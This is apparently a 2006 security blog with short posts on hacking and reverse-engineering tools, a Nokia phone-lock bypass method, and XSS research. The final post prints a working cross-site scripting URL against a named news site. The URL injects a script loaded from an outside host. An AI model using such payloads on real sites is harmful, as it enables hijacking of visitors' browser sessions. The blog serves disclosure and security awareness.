Wednesday, September 13, 2006

THC Nokia Phone-Lock Reset

The Hacker's Choice has released a tool, thc-nokia-unlock, that exploits a design flaw in nokia mobile phones to remove the phone-lock.

The Phone Lock feature is designed to disable the key pad, bluetooth and the USB port. This makes it impossible to access the data stored on the device without knowing the correct code.

This unlock tool make use of some undocumented features of the Symbian OS which is used in most of the Nokia phones. One such feature is a 'recognizer' that can be used to execute a program when the phone boots. A recognizer is loaded and executed when a drive is mounted.

The problem with Phone Lock feature is that it does not disable the Memory Card (MMC). You can remove the Memory Card from a locked phone and install the 'thc-nokia-unlock' tool which infact is a recognizer that performs a hard reset (by software) on the phone.

The Memory Card is mounted when it is placed again into the mobile phone even when the phone is locked, thus executing the tool.

The same recognizer-autostart method can be used to quickly install a backdoor on a locked mobile phone or to propagate a virus.

read more ...

Posted by Jayesh at 7:41 PM 1 comments

Nmap Scripting Engine

From, Buanzo's Consulting blog.
 Nmap-dev mailing list is having an announcement about the final release of Nmap Scripting Engine. A a sample script written by Buanzo for detection of SMTP Open Relay is available here.
read more ...

Posted by Jayesh at 7:40 PM 0 comments

Tuesday, September 05, 2006

PaiMei reverse engineering framework

From pedram.redhive.com
PaiMei, is a reverse engineering framework consisting of multiple extensible components. The framework can essentially be thought of as a reverse engineer's swiss army knife and has already been proven effective for a wide range of both static and dynamic tasks such as fuzzer assistance, code coverage tracking, data flow tracking and more.
read more ...

More tools from this site are available here.

Posted by Jayesh at 11:30 PM 0 comments

Process Stalker

From pedram.redhive.com,
Process Stalking is a term coined to describe the combined process of run-time profiling, state mapping and tracing. Consisting of a series of tools and scripts the goal of a successful stalk is to provide the reverse engineer with a intuitive interface to run-time block-level trace data.

The Process Stalking suite is broken into three main components; an IDA Pro plug-in, a stand alone tracing tool and a series of Python scripts for instrumenting intermediary and GML graph files. The generated GML graph definitions were designed for usage with a freely available interactive graph visualization tool.

A complete usage and script development manual for Process Stalker is available here.

An article detailing a step-by-step application of Process Stalker vs. the MS05-030 Microsoft Security bulletin is available at OpenRCE.org.
read more ...

Posted by Jayesh at 11:23 PM 0 comments

eEye Research Tools

A lot of previously unreleased research tools are now made available at eEye research website, research.eEye.com.
read more ...

Posted by Jayesh at 11:14 PM 0 comments

AxMan ActiveX fuzzing engine

From metasploit.com
AxMan is a web-based ActiveX fuzzing engine. The goal of AxMan is to discover vulnerabilities in COM objects exposed through Internet Explorer. Since AxMan is web-based, any security changes in the browser will also affect the results of the fuzzing process. This allows for a much more realistic test than other COM-based assessment tools. AxMan is designed to be used with Internet Explorer 6 only.
read more ...

Posted by Jayesh at 11:10 PM 0 comments

AttackAPI

From gnucitizen.org
AttackAPI provides simple and intuitive web programmable interface for composing attack vectors with JavaScript and other client (and server) related technologies. The current release supports several browser based attacking techniques and simple but powerful JavaScript console.

read more ...

Other interesting projetcs from gnucitizen.org,
i) JavaScript Shell
ii) JavaScript Authorization Forcer
iii) JavaScript Port Scanner
iv) Fex - enables Firefox Extension Scanner
v) XSSing the Lan

Posted by Jayesh at 10:47 PM 0 comments

Demystifying Cross Site Scripting Attacks

From David Kierznowski
Awaking the Sleeping Giant v1.0
Demystifying Cross Site Scripting Attacks
Author: David Kierznowski

This paper attempts to demystify and categorise current XSS entry nodes, attack capabilities and trends.

XSS attacks are gaining popularity quickly. There are loads of vulnerabilities waiting to be found. It can be simple and difficult to prevent. It can propogate around the Internet in hours, exploit internal or private networks and offers the ability to manipulate web services for fun and profit without compromising a single system.

The whitepaper can be found here.

Posted by Jayesh at 10:29 PM 0 comments

How to get linked from Slashdot

From Jeremiah Grossman's blog
A five step process, making use of Slashdot's PreviewStory feature, to create URL's that link anywhere and say anything.
read more ...

Posted by Jayesh at 9:48 PM 0 comments

Live View

From LiveView site
"...
Live View is a Java-based graphical forensics tool that creates a VMware virtual machine out of a raw (dd-style) disk image or physical disk. This allows the forensic examiner to "boot up" the image or disk and gain an interactive, user-level perspective of the environment, all without modifying the underlying image or disk. Because all changes made to the disk are written to a separate file, the examiner can instantly revert all of his or her changes back to the original pristine state of the disk. The end result is that one need not create extra "throw away" copies of the disk or image to create the virtual machine.
..."
read more ...

Posted by Jayesh at 8:45 PM 0 comments

WildPackets OmniPeek Personal

" ...
OmniPeek Personal, the first commercially developed Expert network analyzer available free for personal use. OmniPeek Personal gives individual users the chance to experience the power and extensibility of WildPackets’ award-winning network analysis technology at no cost.

OmniPeek Personal offers:

* Best-in-class wired and wireless analysis in one application
* Intuitive real-time graphics and display with award-winning UI
* Powerful Visual Expert and Packet Visualizer toolsets
* Application analysis and Apdex scoring that reflects end user satisfaction with applications
* Plug-in extensibility

... "

OmniPeek provides more network analysis features and can be used as an alternative for WireShark/Ethereal.

Posted by Jayesh at 8:39 PM 0 comments

XSS Demonstration

SecurityLab posted a demonstration of Cross Site Scripting (XSS) vulnerabilities in CBS News and the BBC websites.

Looks like BBC has now fixed this flaw in their website but CBS News is still vulnerable.

The URL they provide for CBS is:
http://www.cbsnews.com/stories/2002/02/15/weather_local/
main501644.shtml?zipcode=1--%3E%3Cscript%20src=http://
www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

The problem is with the zipcode part of the site through which one can check local weather.

In the above example, the custom news at http://www.securitylab.ru/test/sc.js is injected to the user's browser session.

The vulnerability can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

read more ...

Posted by Jayesh at 8:21 PM 0 comments

Subscribe to: Posts (Atom)